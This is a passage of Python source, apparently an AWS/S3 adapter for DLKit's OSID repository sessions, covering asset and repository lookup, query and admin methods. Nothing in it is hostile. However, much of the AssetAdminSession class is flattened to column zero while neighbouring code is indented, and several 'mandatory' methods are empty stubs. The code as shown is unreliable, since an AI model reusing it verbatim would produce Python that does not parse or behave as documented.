        an error results. Otherwise, the returned list may contain only
        those asset contents that are accessible through this session.
        :param asset_content_genus_type: an asset content genus type
        :type asset_content_genus_type: ``osid.type.Type``
        :param asset_id: an asset ``Id``
        :type asset_id: ``osid.id.Id``
        :return: the returned ``AssetContent list``
        :rtype: ``osid.repository.AssetContentList``
        :raise: ``NullArgument`` -- ``asset_content_genus_type`` or ``asset_id`` is ``null``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``PermissionDenied`` -- authorization failure
        *compliance: mandatory -- This method must be implemented.*
        """
        return AssetContentList(self._provider_session.get_asset_contents_by_genus_type_for_asset(asset_content_genus_type, asset_id), self._config_map)
class AssetQuerySession(abc_repository_sessions.AssetQuerySession,
                        osid_sessions.OsidSession):
    """This session provides methods for searching among ``Asset`` objects.
    Search queries are constructed with an ``AssetQuery``. Two views
    control which repositories a search covers:
    * federated repository view: searches include assets in
    repositories of which this repository is an ancestor in the
    repository hierarchy
    * isolated repository view: searches are restricted to assets in
    this repository
    Assets may have a query record indicated by their respective record
    types. The query record is accessed via the ``AssetQuery``.
    """
    def get_repository_id(self):
        """Return the ``Id`` of the ``Repository`` in use by this session.
        return: (osid.id.Id) - the ``Repository Id`` associated with
                this session
        *compliance: mandatory -- This method must be implemented.*
        """
        # Pure delegation (awsosid template:
        # osid.resource.ResourceLookupSession.get_bin_id_template).
        provider = self._provider_session
        return provider.get_repository_id()
    repository_id = property(fget=get_repository_id)
    def get_repository(self):
        """Return the ``Repository`` this session is operating on.
        return: (osid.repository.Repository) - the ``Repository``
                associated with this session
        raise: OperationFailed - unable to complete request
        raise: PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*
        """
        # Pure delegation (awsosid template:
        # osid.resource.ResourceLookupSession.get_bin_template).
        provider = self._provider_session
        return provider.get_repository()
    repository = property(fget=get_repository)
    def can_search_assets(self):
        """Tests whether the current user may perform ``Asset`` searches.
        A ``true`` result does not guarantee that authorization will
        succeed; ``false`` means every search method in this session is
        known to raise ``PermissionDenied``, so an application may opt
        to hide search operations from unauthorized users.
        return: (boolean) - ``false`` if search methods are not
                authorized, ``true`` otherwise
        *compliance: mandatory -- This method must be implemented.*
        """
        # Pure delegation (awsosid template:
        # osid.resource.ResourceQuerySession.can_search_resources_template).
        provider = self._provider_session
        return provider.can_search_assets()
    def use_federated_repository_view(self):
        """Federates the view for methods in this session.
        A federated view includes assets in repositories which are
        children of this repository in the repository hierarchy.
        *compliance: mandatory -- This method must be implemented.*
        """
        # Pure delegation (awsosid template:
        # osid.resource.ResourceLookupSession.use_federated_bin_view_template).
        self._provider_session.use_federated_repository_view()
    def use_isolated_repository_view(self):
        """Isolates the view for methods in this session.
        An isolated view restricts lookups to this repository only.
        *compliance: mandatory -- This method must be implemented.*
        """
        # Pure delegation (awsosid template:
        # osid.resource.ResourceLookupSession.use_isolated_bin_view_template).
        self._provider_session.use_isolated_repository_view()
    def get_asset_query(self):
        """Return a new asset query.
        return: (osid.repository.AssetQuery) - the asset query
        *compliance: mandatory -- This method must be implemented.*
        """
        # Pure delegation (awsosid template:
        # osid.resource.ResourceQuerySession.get_resource_query_template).
        provider = self._provider_session
        return provider.get_asset_query()
    asset_query = property(fget=get_asset_query)
    def get_assets_by_query(self, asset_query=None):
        """Return the ``Assets`` matching the given asset query.
        arg: asset_query (osid.repository.AssetQuery): the asset
                query
        return: (osid.repository.AssetList) - the returned ``AssetList``
        raise: NullArgument - ``asset_query`` is ``null``
        raise: OperationFailed - unable to complete request
        raise: PermissionDenied - authorization failure
        raise: Unsupported - the ``asset_query`` is not of this service
        *compliance: mandatory -- This method must be implemented.*
        """
        # Wrap the provider's result in this service's AssetList adapter.
        provider_list = self._provider_session.get_assets_by_query(asset_query)
        return AssetList(provider_list, self._config_map)
    def get_asset_content_query(self):
        """Return a new asset content query.
        return: (osid.repository.AssetContentQuery) - the asset content query
        *compliance: mandatory -- This method must be implemented.*
        """
        provider = self._provider_session
        return provider.get_asset_content_query()
    asset_content_query = property(fget=get_asset_content_query)
    def get_asset_contents_by_query(self, asset_content_query=None):
        """Return the ``AssetContents`` matching the given asset content query.
        arg: asset_content_query (osid.repository.AssetContentQuery): the asset
                content query
        return: (osid.repository.AssetContentList) - the returned ``AssetContentList``
        raise: NullArgument - ``asset_content_query`` is ``null``
        raise: OperationFailed - unable to complete request
        raise: PermissionDenied - authorization failure
        raise: Unsupported - the ``asset_content_query`` is not of this service
        *compliance: mandatory -- This method must be implemented.*
        """
        # Wrap the provider's result in this service's AssetContentList adapter.
        provider_list = self._provider_session.get_asset_contents_by_query(asset_content_query)
        return AssetContentList(provider_list, self._config_map)
class AssetAdminSession(abc_repository_sessions.AssetAdminSession, osid_sessions.OsidSession):
"""This session creates, updates, and deletes ``Assets``.
The data for create and update is provided by the consumer via the
form object. ``OsidForms`` are requested for each create or update
and may not be reused.
Create and update operations differ in their usage. To create an
``Asset,`` an ``AssetForm`` is requested using
``get_asset_form_for_create()`` specifying the desired record
``Types`` or none if no record ``Types`` are needed. The returned
    ``AssetForm`` will indicate that it is to be used with a create
    operation and can be used to examine metadata or validate data prior
    to creation. Once the ``AssetForm`` is submitted to a create
operation, it cannot be reused with another create operation unless
the first operation was unsuccessful. Each ``AssetForm`` corresponds
to an attempted transaction.
For updates, ``AssetForms`` are requested to the ``Asset`` ``Id``
that is to be updated using ``getAssetFormForUpdate()``. Similarly,
the ``AssetForm`` has metadata about the data that can be updated
and it can perform validation before submitting the update. The
``AssetForm`` can only be used once for a successful update and
cannot be reused.
The delete operations delete ``Assets``. To unmap an ``Asset`` from
the current ``Repository,`` the ``AssetRepositoryAssignmentSession``
should be used. These delete operations attempt to remove the
    ``Asset`` itself thus removing it from all known ``Repository``
catalogs.
This session includes an ``Id`` aliasing mechanism to assign an
external ``Id`` to an internally assigned Id.
The view of the administrative methods defined in this session is
determined by the provider. For an instance of this session where no
repository has been specified, it may not be parallel to the
``AssetLookupSession``. For example, a default
``AssetLookupSession`` may view the entire repository hierarchy
while the default ``AssetAdminSession`` uses an isolated
    ``Repository`` to create new ``Assets`` or a specific repository to
operate on a predetermined set of ``Assets``. Another scenario is a
federated provider who does not wish to permit administrative
operations for the federation unaware.
Example create:
if (!session.canCreateAssets()) {
return "asset creation not permitted";
}
Type types[1];
types[0] = assetPhotographType;
if (!session.canCreateAssetWithRecordTypes(types)) {
return "creating an asset with a photograph type is not supported";
}
AssetForm form = session.getAssetFormForCreate();
Metadata metadata = form.getDisplayNameMetadata();
if (metadata.isReadOnly()) {
return "cannot set display name";
}
form.setDisplayName("my photo");
PhotographRecordForm photoForm = (PhotographRecordForm)
form.getRecordForm(assetPhotogaphType);
Metadata metadata = form.getApertureMetadata();
if (metadata.isReadOnly()) {
return ("cannot set aperture");
}
photoForm.setAperture("5.6");
if (!form.isValid()) {
return form.getValidationMessage();
}
Asset newAsset = session.createAsset(form);
"""
    def __init__(self, provider_session, config_map, lookup_session, proxy=None):
        """Initialize this admin session.

        provider_session is the underlying provider session this adapter
        delegates to; config_map and the optional proxy are passed through
        to OsidSession. lookup_session is retained on the instance as
        ``_asset_lookup_session`` -- presumably for asset retrieval by
        other methods of this session; confirm against its callers.
        """
        osid_sessions.OsidSession.__init__(self, provider_session, config_map, proxy)
        self._asset_lookup_session = lookup_session
def get_repository_id(self):
"""Gets the ``Repository`` ``Id`` associated with this session.
return: (osid.id.Id) - the ``Repository Id`` associated with
this session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.get_bin_id_template
return self._provider_session.get_repository_id()
repository_id = property(fget=get_repository_id)
def get_repository(self):
"""Gets the ``Repository`` associated with this session.
return: (osid.repository.Repository) - the ``Repository``
associated with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.get_bin_template
return self._provider_session.get_repository()
repository = property(fget=get_repository)
def can_create_assets(self):
"""Tests if this user can create ``Assets``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known creating an ``Asset``
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may opt not to offer create
operations to an unauthorized user.
return: (boolean) - ``false`` if ``Asset`` creation is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceLookupSession.can_create_resources_template
return self._provider_session.can_create_assets()
def can_create_asset_with_record_types(self, asset_record_types=None):
"""Tests if this user can create a single ``Asset`` using the desired record types.
While ``RepositoryManager.getAssetRecordTypes()`` can be used to
examine which records are supported, this method tests which
record(s) are required for creating a specific ``Asset``.
Providing an empty array tests if an ``Asset`` can be created
with no records.
arg: asset_record_types (osid.type.Type[]): array of asset
record types
return: (boolean) - ``true`` if ``Asset`` creation using the
specified record ``Types`` is supported, ``false``
otherwise
raise: NullArgument - ``asset_record_types`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceAdminSession.can_create_resource_with_record_types_template
return self._provider_session.can_create_asset_with_record_types(asset_record_types)
def get_asset_form_for_create(self, asset_record_types=None):
"""Gets the asset form for creating new assets.
A new form should be requested for each create transaction.
arg: asset_record_types (osid.type.Type[]): array of asset
record types
return: (osid.repository.AssetForm) - the asset form
raise: NullArgument - ``asset_record_types`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - unable to get form for requested record
types
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceAdminSession.get_resource_form_for_create_template
return self._provider_session.get_asset_form_for_create(asset_record_types)
def create_asset(self, asset_form=None):
"""Creates a new ``Asset``.
arg: asset_form (osid.repository.AssetForm): the form for
this ``Asset``
return: (osid.repository.Asset) - the new ``Asset``
raise: IllegalState - ``asset_form`` already used in a create
transaction
raise: InvalidArgument - one or more of the form elements is
invalid
raise: NullArgument - ``asset_form`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``asset_form`` did not originate from
``get_asset_form_for_create()``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from awsosid template for -
# osid.resource.ResourceAdminSession.create_resource_template
return self._provider_session.create_asset(asset_form)
def can_update_assets(self):
    """Ask the wrapped provider whether this user may update ``Assets``.

    A return of true does not guarantee successful authorization; a
    return of false indicates updating would yield ``PermissionDenied``.
    Intended as a hint so applications can hide update operations from
    unauthorized users.
    return: (boolean) - ``false`` if ``Asset`` modification is not
        authorized, ``true`` otherwise
    *compliance: mandatory -- This method must be implemented.*
    """
    # The authorization hint comes straight from the provider session.
    return self._provider_session.can_update_assets()
def get_asset_form_for_update(self, asset_id=None):
    """Fetch a form for updating an existing asset from the provider.

    A new asset form should be requested for each update transaction.
    arg: asset_id (osid.id.Id): the ``Id`` of the ``Asset``
    return: (osid.repository.AssetForm) - the asset form
    raise: NotFound - ``asset_id`` is not found
    raise: NullArgument - ``asset_id`` is null
    raise: OperationFailed - unable to complete request
    raise: PermissionDenied - authorization failure
    *compliance: mandatory -- This method must be implemented.*
    """
    # Asset-level forms need no AWS wrapping; only content forms do.
    return self._provider_session.get_asset_form_for_update(asset_id)
def duplicate_asset(self, asset_id):
    """Duplicate the ``Asset`` identified by ``asset_id`` via the provider session.

    arg: asset_id (osid.id.Id): the ``Id`` of the ``Asset`` to duplicate
    return: the duplicated ``Asset`` as returned by the underlying provider
    """
    # Implemented from kitosid template for -
    # osid.resource.ResourceAdminSession.get_resource_form_for_update
    return self._provider_session.duplicate_asset(asset_id)
def update_asset(self, asset_form=None):
    """Update an existing asset and wrap the result for AWS URL handling.

    arg: asset_form (osid.repository.AssetForm): the form
        containing the elements to be updated
    raise: IllegalState - ``asset_form`` already used in an update
        transaction
    raise: InvalidArgument - the form contains an invalid value
    raise: NullArgument - ``asset_form`` is ``null``
    raise: OperationFailed - unable to complete request
    raise: PermissionDenied - authorization failure
    raise: Unsupported - ``asset_form`` did not originate from
        ``get_asset_form_for_update()``
    *compliance: mandatory -- This method must be implemented.*
    """
    # Delegate the update, then wrap the provider's result in the
    # AWS-aware Asset adapter so signed URLs can be generated later.
    updated = self._provider_session.update_asset(asset_form)
    return Asset(updated, self._config_map)
def can_delete_assets(self):
    """Ask the wrapped provider whether this user may delete ``Assets``.

    A return of true does not guarantee successful authorization; a
    return of false indicates deleting would yield ``PermissionDenied``.
    Intended as a hint so applications can hide delete operations from
    unauthorized users.
    return: (boolean) - ``false`` if ``Asset`` deletion is not
        authorized, ``true`` otherwise
    *compliance: mandatory -- This method must be implemented.*
    """
    # The authorization hint comes straight from the provider session.
    return self._provider_session.can_delete_assets()
def delete_asset(self, asset_id=None):
    """Delete an ``Asset``, cleaning up its contents (and any AWS files) first.

    arg: asset_id (osid.id.Id): the ``Id`` of the ``Asset`` to
        remove
    raise: NotFound - ``asset_id`` not found
    raise: NullArgument - ``asset_id`` is ``null``
    raise: OperationFailed - unable to complete request
    raise: PermissionDenied - authorization failure
    *compliance: mandatory -- This method must be implemented.*
    """
    # Delete each AssetContent through our own method so S3-hosted
    # files get removed, then delete the asset record itself.
    target = self._asset_lookup_session.get_asset(asset_id)
    for content in target.asset_contents:
        self.delete_asset_content(content.ident)
    self._provider_session.delete_asset(asset_id)
def can_manage_asset_aliases(self):
    """Tests if this user can manage ``Id`` aliases for ``Assets``.
    A return of true does not guarantee successful authorization. A
    return of false indicates that it is known changing an alias
    will result in a ``PermissionDenied``. This is intended as a
    hint to an application that may opt not to offer alias
    operations to an unauthorized user.
    return: (boolean) - ``false`` if ``Asset`` aliasing is not
        authorized, ``true`` otherwise
    *compliance: mandatory -- This method must be implemented.*
    """
    # NOTE(review): unimplemented stub -- returns None rather than the
    # documented boolean; confirm whether this should delegate to the
    # provider session like the other can_* methods in this class.
    pass
def alias_asset(self, asset_id=None, alias_id=None):
    """Adds an ``Id`` to an ``Asset`` for the purpose of creating compatibility.
    The primary ``Id`` of the ``Asset`` is determined by the
    provider. The new ``Id`` performs as an alias to the primary
    ``Id``. If the alias is a pointer to another asset, it is
    reassigned to the given asset ``Id``.
    arg: asset_id (osid.id.Id): the ``Id`` of an ``Asset``
    arg: alias_id (osid.id.Id): the alias ``Id``
    raise: AlreadyExists - ``alias_id`` is already assigned
    raise: NotFound - ``asset_id`` not found
    raise: NullArgument - ``asset_id`` or ``alias_id`` is ``null``
    raise: OperationFailed - unable to complete request
    raise: PermissionDenied - authorization failure
    *compliance: mandatory -- This method must be implemented.*
    """
    # NOTE(review): unimplemented stub -- despite the "mandatory"
    # compliance note, no aliasing is performed; confirm whether this
    # should delegate to the provider session.
    pass
def can_create_asset_content(self):
    """Ask the wrapped provider whether this user may create asset content.

    A return of true does not guarantee successful authorization; a
    return of false indicates creating an ``AssetContent`` would yield
    ``PermissionDenied``. Intended as a hint so applications can hide
    create operations from unauthorized users.
    return: (boolean) - ``false`` if ``Asset`` content creation is
        not authorized, ``true`` otherwise
    *compliance: mandatory -- This method must be implemented.*
    """
    # The authorization hint comes straight from the provider session.
    return self._provider_session.can_create_asset_content()
def can_create_asset_content_with_record_types(self, asset_content_record_types=None):
    """Ask the provider if an ``AssetContent`` can be created with these record types.

    While ``RepositoryManager.getAssetContentRecordTypes()`` lists which
    records are supported, this method tests which records are required
    for creating a specific ``AssetContent``. An empty array tests
    whether an ``AssetContent`` can be created with no records.
    arg: asset_content_record_types (osid.type.Type[]): array of
        asset content record types
    return: (boolean) - ``true`` if ``AssetContent`` creation using
        the specified ``Types`` is supported, ``false`` otherwise
    raise: NullArgument - ``asset_content_record_types`` is ``null``
    *compliance: mandatory -- This method must be implemented.*
    """
    # Pure pass-through of the capability query.
    return self._provider_session.can_create_asset_content_with_record_types(asset_content_record_types)
def get_asset_content_form_for_create(self,
                                      asset_id=None,
                                      asset_content_record_types=None):
    """Gets an asset content form for creating new asset contents.

    arg: asset_id (osid.id.Id): the ``Id`` of an ``Asset``
    arg: asset_content_record_types (osid.type.Type[]): array of
        asset content record types
    return: (osid.repository.AssetContentForm) - the asset content
        form
    raise: NotFound - ``asset_id`` is not found
    raise: NullArgument - ``asset_id`` or
        ``asset_content_record_types`` is ``null``
    raise: OperationFailed - unable to complete request
    raise: PermissionDenied - authorization failure
    raise: Unsupported - unable to get form for requested record
        types
    *compliance: mandatory -- This method must be implemented.*
    """
    if AWS_ASSET_CONTENT_RECORD_TYPE in asset_content_record_types:
        # Strip the AWS record type before delegating, but do so on a
        # copy: the original implementation called .remove() on the
        # caller's list, mutating it as a hidden side effect.
        remaining_types = list(asset_content_record_types)
        remaining_types.remove(AWS_ASSET_CONTENT_RECORD_TYPE)
        return AssetContentForm(
            self._provider_session.get_asset_content_form_for_create(
                asset_id,
                remaining_types),
            self._config_map,
            self.get_repository_id())
    return self._provider_session.get_asset_content_form_for_create(
        asset_id,
        asset_content_record_types)
def create_asset_content(self, asset_content_form=None):
    """Create new ``AssetContent`` for a given asset, unwrapping AWS forms.

    arg: asset_content_form (osid.repository.AssetContentForm):
        the form for this ``AssetContent``
    return: (osid.repository.AssetContent) - the new
        ``AssetContent``
    raise: IllegalState - ``asset_content_form`` already used in a
        create transaction
    raise: InvalidArgument - one or more of the form elements is
        invalid
    raise: NullArgument - ``asset_content_form`` is ``null``
    raise: OperationFailed - unable to complete request
    raise: PermissionDenied - authorization failure
    raise: Unsupported - ``asset_content_form`` did not originate
        from ``get_asset_content_form_for_create()``
    *compliance: mandatory -- This method must be implemented.*
    """
    # AWS-wrapped forms carry the real provider form in _payload.
    if isinstance(asset_content_form, AssetContentForm):
        payload = asset_content_form._payload
    else:
        payload = asset_content_form
    asset_content = self._provider_session.create_asset_content(payload)
    # Wrap S3-hosted results in the AWS-aware adapter; a content whose
    # URL accessors choke (TypeError) is returned unwrapped.
    try:
        if asset_content.has_url() and 'amazonaws.com' in asset_content.get_url():
            return AssetContent(asset_content, self._config_map)
    except TypeError:
        pass
    return asset_content
def can_update_asset_contents(self):
    """Ask the wrapped provider whether this user may update ``AssetContent``.

    A return of true does not guarantee successful authorization; a
    return of false indicates updating would yield
    ``PermissionDenied``. Intended as a hint so applications can hide
    update operations from unauthorized users.
    return: (boolean) - ``false`` if ``AssetContent`` modification
        is not authorized, ``true`` otherwise
    *compliance: mandatory -- This method must be implemented.*
    """
    # The authorization hint comes straight from the provider session.
    return self._provider_session.can_update_asset_contents()
def get_asset_content_form_for_update(self, asset_content_id=None):
    """Gets the asset content form for updating an existing asset content.

    A new asset content form should be requested for each update
    transaction.
    arg: asset_content_id (osid.id.Id): the ``Id`` of the
        ``AssetContent``
    return: (osid.repository.AssetContentForm) - the asset content
        form
    raise: NotFound - ``asset_content_id`` is not found
    raise: NullArgument - ``asset_content_id`` is ``null``
    raise: OperationFailed - unable to complete request
    *compliance: mandatory -- This method must be implemented.*
    """
    asset_content_form = self._provider_session.get_asset_content_form_for_update(
        asset_content_id)
    # Guard against contents that have no URL values yet: the original
    # code indexed [0] unconditionally, which raises IndexError for an
    # empty existing-values list.
    existing_urls = asset_content_form.get_url_metadata().get_existing_string_values()
    if existing_urls and 'amazonaws.com' in existing_urls[0]:
        # S3-hosted content gets the AWS-aware form wrapper.
        return AssetContentForm(asset_content_form,
                                self._config_map,
                                self.get_repository_id())
    return asset_content_form
def update_asset_content(self, asset_content_form=None):
    """Update an existing asset content, unwrapping AWS forms as needed.

    arg: asset_content_form (osid.repository.AssetContentForm):
        the form containing the elements to be updated
    raise: IllegalState - ``asset_content_form`` already used in an
        update transaction
    raise: InvalidArgument - the form contains an invalid value
    raise: NullArgument - ``asset_form`` is ``null``
    raise: OperationFailed - unable to complete request
    raise: PermissionDenied - authorization failure
    raise: Unsupported - ``asset_content_form`` did not originate
        from ``get_asset_content_form_for_update()``
    *compliance: mandatory -- This method must be implemented.*
    """
    # AWS-wrapped forms carry the real provider form in _payload.
    if isinstance(asset_content_form, AssetContentForm):
        payload = asset_content_form._payload
    else:
        payload = asset_content_form
    asset_content = self._provider_session.update_asset_content(payload)
    # Wrap S3-hosted results in the AWS-aware adapter.
    if (asset_content is not None and
            asset_content.has_url() and
            'amazonaws.com' in asset_content.get_url()):
        return AssetContent(asset_content, self._config_map)
    return asset_content
def can_delete_asset_contents(self):
    """Ask the wrapped provider whether this user may delete ``AssetContent``.

    A return of true does not guarantee successful authorization; a
    return of false indicates deleting would yield
    ``PermissionDenied``. Intended as a hint so applications can hide
    delete operations from unauthorized users.
    return: (boolean) - ``false`` if ``AssetContent`` deletion is
        not authorized, ``true`` otherwise
    *compliance: mandatory -- This method must be implemented.*
    """
    # The authorization hint comes straight from the provider session.
    return self._provider_session.can_delete_asset_contents()
def delete_asset_content(self, asset_content_id=None):
    """Deletes content from an ``Asset``, removing any backing S3 file first.

    arg: asset_content_id (osid.id.Id): the ``Id`` of the
        ``AssetContent``
    raise: NotFound - ``asset_content_id`` is not found
    raise: NullArgument - ``asset_content_id`` is ``null``
    raise: OperationFailed - unable to complete request
    raise: PermissionDenied - authorization failure
    *compliance: mandatory -- This method must be implemented.*
    """
    asset_content = self._get_asset_content(asset_content_id)
    if asset_content.has_url() and 'amazonaws.com' in asset_content.get_url():
        # The content is hosted on S3: remove the stored object first so
        # deleting the record does not orphan the file.  The key is the
        # URL path after the amazonaws.com host.
        key = asset_content.get_url().split('amazonaws.com')[1]
        remove_file(self._config_map, key)
    # Both branches of the original duplicated this call; do it once.
    self._provider_session.delete_asset_content(asset_content_id)
def _get_asset_id_with_enclosure(self, enclosure_id):
    # Pass-through to the provider session's private enclosure lookup.
    return self._provider_session._get_asset_id_with_enclosure(enclosure_id)
def _get_asset_content(self, asset_content_id):
"""stub"""
asset_content = None
for asset in self._asset_lookup_session.get_assets():
for content in asset.get_asset_contents():
if content.get_id() == asset_content_id:
asset_content = content
break
if asset_content is not None:
break
if asset_content is None:
raise NotFound('THe AWS Adapter could not find AssetContent ' +
str(asset_content_id))
return asset_content
class RepositoryLookupSession(abc_repository_sessions.RepositoryLookupSession,
                              osid_sessions.OsidSession):
    """Authorization-checking session for retrieving ``Repository`` objects.

    A ``Repository`` represents a collection of ``Assets`` and
    ``Compositions``. The session supports two retrieval views:

    * comparative view: elements may be silently omitted or re-ordered
    * plenary view: provides a complete set or is an error condition

    The comparative view suits most applications since it permits
    operation even when some data is inaccessible; an administrative
    application may instead require the plenary view so that every
    ``Repository`` element is available. Repositories may carry
    additional records indicated by their record types; such records
    may not be accessed through a cast of the ``Repository``.
    """

    def __init__(self, provider_session, authz_session, proxy=None):
        osid_sessions.OsidSession.__init__(self, provider_session, authz_session, proxy)
        self._qualifier_id = Id('authorization.Qualifier%3AROOT%40dlkit.mit.edu')
        # This needs to be done right
        self._id_namespace = 'repository.Repository'

    def can_lookup_repositories(self):
        """Tests if this user can perform ``Repository`` lookups.

        A false return indicates all methods in this session will raise
        ``PermissionDenied``; a hint so applications can hide lookup
        operations from unauthorized users.
        return: (boolean) - ``false`` if lookup methods are not
            authorized, ``true`` otherwise
        *compliance: mandatory -- This method must be implemented.*
        """
        # The hint comes straight from the wrapped provider session.
        return self._provider_session.can_lookup_repositories()

    def use_comparative_repository_view(self):
        """Allow lookups to omit or translate elements rather than error.

        Used when greater interoperability is desired at the expense of
        precision.
        *compliance: mandatory -- This method must be implemented.*
        """
        self._provider_session.use_comparative_repository_view()

    def use_plenary_repository_view(self):
        """Require lookups to return exactly what is requested or error.

        Used when greater precision is desired at the expense of
        interoperability.
        *compliance: mandatory -- This method must be implemented.*
        """
        self._provider_session.use_plenary_repository_view()

    def get_repository(self, repository_id=None):
        """Gets the ``Repository`` specified by its ``Id``.

        In plenary mode the exact ``Id`` is found or ``NotFound``
        results; otherwise the returned ``Repository`` may have a
        different ``Id``, e.g. a duplicate retained for compatibility.
        arg: repository_id (osid.id.Id): ``Id`` of the ``Repository``
        return: (osid.repository.Repository) - the repository
        raise: NotFound - ``repository_id`` not found
        raise: NullArgument - ``repository_id`` is ``null``
        raise: OperationFailed - unable to complete request
        raise: PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*
        """
        # Guard clause: authorize first, then delegate.
        if self._can('lookup'):
            return self._provider_session.get_repository(repository_id)
        raise PermissionDenied()

    def get_repositories_by_ids(self, repository_ids=None):
        """Gets a ``RepositoryList`` corresponding to the given ``IdList``.

        In plenary mode the returned list contains every repository in
        the ``Id`` list, in order and including duplicates, or errors if
        any ``Id`` is not found or inaccessible. Otherwise inaccessible
        ``Repositories`` may be omitted and order is not guaranteed.
        arg: repository_ids (osid.id.IdList): the list of ``Ids`` to
            retrieve
        return: (osid.repository.RepositoryList) - the returned
            ``Repository list``
        raise: NotFound - an ``Id`` was not found
        raise: NullArgument - ``repository_ids`` is ``null``
        raise: OperationFailed - unable to complete request
        raise: PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*
        """
        if self._can('lookup'):
            return self._provider_session.get_repositories_by_ids(repository_ids)
        raise PermissionDenied()

    def get_repositories_by_genus_type(self, repository_genus_type=None):
        """Gets a ``RepositoryList`` of the given genus ``Type``, excluding derived types.

        arg: repository_genus_type (osid.type.Type): a repository
            genus type
        return: (osid.repository.RepositoryList) - the returned
            ``Repository list``
        raise: NullArgument - ``repository_genus_type`` is ``null``
        raise: OperationFailed - unable to complete request
        raise: PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*
        """
        # NOTE(review): unimplemented stub.
        pass

    def get_repositories_by_parent_genus_type(self, repository_genus_type=None):
        """Gets a ``RepositoryList`` of the given genus ``Type``, including derived types.

        arg: repository_genus_type (osid.type.Type): a repository
            genus type
        return: (osid.repository.RepositoryList) - the returned
            ``Repository list``
        raise: NullArgument - ``repository_genus_type`` is ``null``
        raise: OperationFailed - unable to complete request
        raise: PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*
        """
        # NOTE(review): unimplemented stub.
        pass

    def get_repositories_by_record_type(self, repository_record_type=None):
        """Gets a ``RepositoryList`` containing the given repository record ``Type``.

        arg: repository_record_type (osid.type.Type): a repository
            record type
        return: (osid.repository.RepositoryList) - the returned
            ``Repository list``
        raise: NullArgument - ``repository_record_type`` is ``null``
        raise: OperationFailed - unable to complete request
        raise: PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*
        """
        # NOTE(review): unimplemented stub.
        pass

    def get_repositories_by_provider(self, resource_id=None):
        """Gets a ``RepositoryList`` from the given provider.

        arg: resource_id (osid.id.Id): a resource ``Id``
        return: (osid.repository.RepositoryList) - the returned
            ``Repository list``
        raise: NullArgument - ``resource_id`` is ``null``
        raise: OperationFailed - unable to complete request
        raise: PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*
        """
        # NOTE(review): unimplemented stub.
        pass

    def get_repositories(self):
        """Gets all ``Repositories``.

        In plenary mode the returned list contains all known
        repositories or an error results; otherwise only those
        accessible through this session may be returned.
        return: (osid.repository.RepositoryList) - a list of
            ``Repositories``
        raise: OperationFailed - unable to complete request
        raise: PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*
        """
        if self._can('lookup'):
            return self._provider_session.get_repositories()
        raise PermissionDenied()

    repositories = property(fget=get_repositories)
class RepositoryAdminSession(abc_repository_sessions.RepositoryAdminSession,
                             osid_sessions.OsidSession):
    """Authorization-checking session that creates, updates, and deletes ``Repositories``.

    Data for create and update is supplied by the consumer via form
    objects; ``OsidForms`` are requested per transaction and may not be
    reused. To create a ``Repository`` request a ``RepositoryForm`` via
    ``get_repository_form_for_create()`` with the desired record
    ``Types`` (or none); once submitted to a create operation it cannot
    be reused unless that operation failed. Updates work analogously
    through ``get_repository_form_for_update()``. Delete operations
    remove ``Repositories``, and an ``Id`` aliasing mechanism lets an
    external ``Id`` be assigned to an internally assigned one.
    """

    def __init__(self, provider_session, authz_session, proxy=None):
        osid_sessions.OsidSession.__init__(self, provider_session, authz_session, proxy)
        self._qualifier_id = Id('authorization.Qualifier%3AROOT%40dlkit.mit.edu')
        # This needs to be done right
        self._id_namespace = 'repository.Repository'

    def can_create_repositories(self):
        """Tests if this user can create ``Repositories``.

        A false return indicates creating a ``Repository`` is known to
        raise ``PermissionDenied``; a hint so applications can hide
        create operations from unauthorized users.
        return: (boolean) - ``false`` if ``Repository`` creation is not
            authorized, ``true`` otherwise
        *compliance: mandatory -- This method must be implemented.*
        """
        return self._provider_session.can_create_repositories()

    def can_create_repository_with_record_types(self, repository_record_types=None):
        """Tests if this user can create a ``Repository`` with the given record types.

        Providing an empty array tests if a ``Repository`` can be
        created with no records.
        arg: repository_record_types (osid.type.Type[]): array of
            repository record types
        return: (boolean) - ``true`` if ``Repository`` creation using
            the specified ``Types`` is supported, ``false`` otherwise
        raise: NullArgument - ``repository_record_types`` is ``null``
        *compliance: mandatory -- This method must be implemented.*
        """
        return self._provider_session.can_create_repository_with_record_types(
            repository_record_types)

    def get_repository_form_for_create(self, repository_record_types=None):
        """Gets the repository form for creating new repositories.

        A new form should be requested for each create transaction.
        arg: repository_record_types (osid.type.Type[]): array of
            repository record types
        return: (osid.repository.RepositoryForm) - the repository form
        raise: NullArgument - ``repository_record_types`` is ``null``
        raise: OperationFailed - unable to complete request
        raise: PermissionDenied - authorization failure
        raise: Unsupported - unable to get form for requested record
            types
        *compliance: mandatory -- This method must be implemented.*
        """
        if not self._can('create'):
            raise PermissionDenied()
        return self._provider_session.get_repository_form_for_create(repository_record_types)

    def create_repository(self, repository_form=None):
        """Creates a new ``Repository``.

        arg: repository_form (osid.repository.RepositoryForm): the
            form for this ``Repository``
        return: (osid.repository.Repository) - the new ``Repository``
        raise: IllegalState - ``repository_form`` already used in a
            create transaction
        raise: InvalidArgument - one or more of the form elements is
            invalid
